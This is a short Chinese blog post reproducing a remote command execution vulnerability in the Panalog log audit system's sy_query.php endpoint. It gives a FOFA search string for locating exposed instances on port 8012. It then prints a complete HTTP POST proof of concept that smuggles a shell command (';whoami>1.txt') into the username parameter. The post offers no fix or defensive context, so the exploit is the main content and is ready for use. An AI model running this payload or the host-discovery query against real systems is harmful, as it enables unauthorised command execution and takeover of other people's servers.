Panalog 日志审计系统前台RCE漏洞复现-白红宇的个人博客

Panalog 日志审计系统前台RCE漏洞复现

发布日期：2025-05-01 15:24:18 浏览次数：2 分类：技术文章

本文共 473 字，大约阅读时间需要 1 分钟。

0x01 产品简介

Panalog是一款日志审计系统，方便用户统一集中监控、管理在网的海量设备。

0x02 漏洞概述

Panalog日志审计系统 sy_query.php接口处存在远程命令执行漏洞，攻击者可执行任意命令，接管服务器权限。

0x03 复现环境

FOFA：app="Panabit-Panalog" && port="8012"

0x04 漏洞复现

PoC-1

POST /account/sy_query.php HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipConnection: closeusername=;whoami>1.txt

上一篇：PANDA VALUE_COUNTS包含GROUP BY之前的所有值

下一篇：Panalog 日志审计系统 sprog_upstatus.php SQL 注入漏洞复现(XVE-2024-5232)

发表评论

关于作者

喝酒易醉，品茶养心，人生如梦，品茶悟道，何以解忧？唯有杜康！

-- 愿君每日到此一游！